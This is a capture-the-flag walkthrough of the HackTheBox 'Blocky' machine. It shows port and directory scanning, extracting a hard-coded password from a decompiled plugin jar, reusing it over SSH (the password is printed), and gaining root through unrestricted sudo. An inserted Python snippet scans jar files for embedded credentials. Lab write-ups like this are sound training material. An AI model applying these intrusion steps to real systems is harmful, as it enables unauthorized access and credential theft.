HackTheBox Blocky Walkthrough

Initial Enumeration

I started the initial enumeration by running a full port scan with nmap, looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ nmap -sC -sV -p- -T5 -oN nmap/all-ports 10.10.10.37
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:04 IST
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu) 
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS 
|_http-generator: WordPress 4.8
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.72 seconds

The scan reports five ports, four of them open (8192 is closed):

Port 21 - FTP ProFTPD 1.3.5a
Port 22 - SSH OpenSSH 7.2p2
Port 80 - Apache httpd 2.4.18 (WordPress 4.8)
Port 8192 - sophos (closed)
Port 25565 - Minecraft server 1.11.2

Let's start the enumeration with port 80 first.

Web Enumeration and User Shell

When we visit the URL http://10.10.10.37 in a web browser, it redirects to http://blocky.htb, so let's add the blocky.htb hostname to our /etc/hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts                          
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.37     blocky.htb

Now when we visit http://blocky.htb in our web browser, it shows us a WordPress website.

After looking at one of the posts, I found the username notch.

Next, I ran a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/12 11:05:08 Starting gobuster in directory enumeration mode
===============================================================
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]   
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/] 
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]   
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/] 
/server-status        (Status: 403) [Size: 298]

===============================================================
2022/07/12 12:02:45 Finished
===============================================================

Let's check these directories one by one.

http://blocky.htb/wiki - This has nothing useful.

http://blocky.htb/phpmyadmin - This contains a standard phpMyAdmin installation, but we do not have credentials to log in.

http://blocky.htb/plugins - This contains two .jar files. I downloaded both of them to my system.

To enumerate these further, I decompiled both jars with the jd-gui tool. The griefprevention-1.11.2-3.1.1.298.jar is a GriefPrevention plugin from Minecraft Forge. It is less likely to contain any vulnerabilities.

The BlockyCore.jar contains an SQL username and password hard-coded as string constants.

Next, I ran wpscan to look for WordPress users and vulnerable plugins.
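As an added example (not code from the original walkthrough or from the BlockyCore project), the script below pulls string literals straight out of a jar's class files by parsing the class-file constant pool, which is where javac stores them, and flags credential-looking ones; this is the same information jd-gui shows when you open the decompiled class. The jar it scans is constructed in memory, and its class names, strings and the SECRET pattern are assumptions chosen for the demo.

```python
# Added example, not code from the walkthrough: javac keeps string literals in
# the class-file constant pool, so scanning CONSTANT_Utf8 entries surfaces
# hard-coded credentials such as those in BlockyCore.jar without a decompiler.
# The jar scanned below is constructed in memory and all its values are made up.
import io, re, struct, zipfile

# Byte widths of the fixed-size constant-pool entry kinds, keyed by tag.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SECRET = re.compile(r"pass(word)?|secret|token|jdbc:", re.I)

def utf8_constants(data):
    """Return every CONSTANT_Utf8 string in a class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]   # number of pool slots + 1
    pos, i, out = 10, 1, []
    while i < count:
        tag = data[pos]
        if tag == 1:                              # CONSTANT_Utf8: u2 length, bytes
            n = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            out.append(data[pos + 3:pos + 3 + n].decode("utf-8", "replace"))
            pos += 3 + n
        else:
            pos += 1 + FIXED[tag]
        i += 2 if tag in (5, 6) else 1            # long/double take two slots
    return out

def scan_jar(jar_bytes):
    """Map each .class entry in the jar to its credential-looking strings."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".class"):
                found = [s for s in utf8_constants(z.read(name)) if SECRET.search(s)]
                if found:
                    hits[name] = found
    return hits

def make_class(strings):
    """Build a minimal class file whose constant pool holds `strings` (constructed)."""
    pool = b"".join(b"\x01" + struct.pack(">H", len(s)) + s.encode() for s in strings)
    header = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(strings) + 1)
    return header + pool + b"\x00" * 14  # zeroed flags, class refs, member/attr counts

def sample_jar():
    """Constructed jar with one class carrying made-up SQL connection settings."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("com/example/Core.class", make_class(["sqlUser", "sqlPass", "jdbc:mysql://db/wp"]))
    return buf.getvalue()
```

Running scan_jar over a real plugin jar reports, per class, which string constants deserve a look; a clean build should return an empty dict.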

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ wpscan --url http://blocky.htb -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Jul 12 15:30:11 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: http://blocky.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
 |  - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://blocky.htb/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 12 15:30:23 2022
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 14.556 KB
[+] Data Received: 458.008 KB
[+] Memory used: 227.941 MB
[+] Elapsed time: 00:00:11

We have only one WordPress user. I tried logging in to /wp-admin with this username and the password found in BlockyCore.jar, but it does not work.

However, the same password is reused for the notch account, so we can log in as user notch via SSH.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@blocky.htb
                                                                      
The authenticity of host 'blocky.htb (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 12 02:28:22 2022 from 10.10.14.5
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

We got a shell! Now we can read the user flag from the home directory of user notch.

notch@Blocky:~$ cat user.txt 
b1ec3aef************************

Root Shell

Getting a root shell was a piece of cake! I used the sudo -l command to check whether the user notch can run any commands as root.

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Bingo! The user can run any command as root, so we can use the following command to get a shell as root.

notch@Blocky:~$ sudo su -
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)

Hurray! We are root. Now we can read the final flag from root's home directory.

root@Blocky:~# cat root.txt 
79e5ef26************************

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Bradley Armstrong.